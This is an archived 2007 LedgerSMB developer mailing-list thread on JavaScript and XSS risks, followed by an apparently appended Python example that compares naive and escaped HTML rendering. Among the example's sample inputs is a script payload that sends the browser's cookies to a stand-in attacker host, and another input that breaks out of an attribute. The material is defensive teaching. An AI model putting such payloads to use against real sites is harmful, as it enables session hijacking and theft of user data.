Hi Chris; I have been following this issue. I can tell you that we are not looking at allowing users to add their own JavaScript to pages. This is just one example of what user-defined JavaScript can do. In general, we do not think that it is a good security practice to allow users of the application to run arbitrary code in other people's web browsers.
This looks like a subtype of XSS attacks and we take these seriously.

Best Wishes,
Chris Travers

On 4/19/07, Chris Bennett <[EMAIL PROTECTED]> wrote:
> http://www.ngssoftware.com/research/papers/InterProtocolExploitation.pdf
>
> Summary: A way of exploiting web browsers located within the security
> perimeter (i.e. access to internal network)
> using something like JavaScript from an external web page to launch
> a buffer overflow attack on the internal network.
> Seems like problems like this could have serious implications
> against many applications that are badly written but thought safe since
> not exposed to the Internet.
> Obviously LSMB would not be susceptible to buffer overflows, but every
> day I see more and more seriously negative stuff about JavaScript.
> My understanding is that LSMB development is going to add a lot of
> JavaScript-based web 2.0/AJAX type stuff, which IS wonderful to use.
> Are there plans for the new interfaces to "degrade gracefully" without
> loss of function (some loss of convenience couldn't be avoided), if a
> person found that JavaScript HAD to be turned off and kept off because
> of non-LSMB security issues?
>
> Chris Bennett
>
> -------------------------------------------------------------------------
> This SF.net email is sponsored by DB2 Express
> Download DB2 Express C - the FREE version of DB2 express and take
> control of your XML. No limits. Just data. Click to get it now.
> http://sourceforge.net/powerbar/db2/
> _______________________________________________
> Ledger-smb-devel mailing list
> [email protected]
> https://lists.sourceforge.net/lists/listinfo/ledger-smb-devel
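As an added illustration of the point made in the reply above (stored user input becoming script in other users' browsers is a form of XSS), here is a small Python example. It is not LedgerSMB code (the project is written in Perl) and not from either poster; the "customer name" values are constructed samples, and the rendering functions are hypothetical stand-ins for a template that echoes a stored field back into a page.

```python
import html

# Constructed sample inputs: what a malicious user might type into a free-text
# field such as a customer name. Neither value comes from the original thread.
MALICIOUS_NAME = (
    '<script>document.location="http://attacker.invalid/?c="'
    '+document.cookie</script>'
)
ATTRIBUTE_BREAKOUT = '" onfocus="alert(1)" autofocus="'


def render_naive(name: str) -> str:
    """Vulnerable: the stored value is interpolated straight into the page.

    A <script> element entered by one user is then executed in the browser of
    every other user who views the record: exactly the "arbitrary code in
    other people's browsers" the reply refuses to allow.
    """
    return f"<p>Customer: {name}</p>"


def render_escaped(name: str) -> str:
    """Hardened: escape for the HTML text context at output time.

    html.escape turns <, >, & and (with quote=True) " and ' into entities, so
    the browser renders the characters as text instead of parsing markup.
    """
    return f"<p>Customer: {html.escape(name, quote=True)}</p>"


def render_attribute(name: str) -> str:
    """Same value placed inside a quoted attribute.

    quote=True matters here: an unescaped " would close the attribute and let
    the rest of the input add event-handler attributes of its own.
    """
    escaped = html.escape(name, quote=True)
    return f'<input type="text" name="customer" value="{escaped}">'


def contains_script_element(page: str) -> bool:
    """Crude marker used only to contrast the two renderings (a real test
    would parse the HTML); true when a raw <script tag survives in the page."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_naive(MALICIOUS_NAME))      # script tag reaches the browser
    print(render_escaped(MALICIOUS_NAME))    # rendered as inert text
    print(render_attribute(ATTRIBUTE_BREAKOUT))  # attribute stays closed
```

Escaping at output time, chosen per context (text, attribute, URL, script), is the usual fix; if users must be allowed some markup, that calls for an allowlist-based sanitizer, which this example does not attempt.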
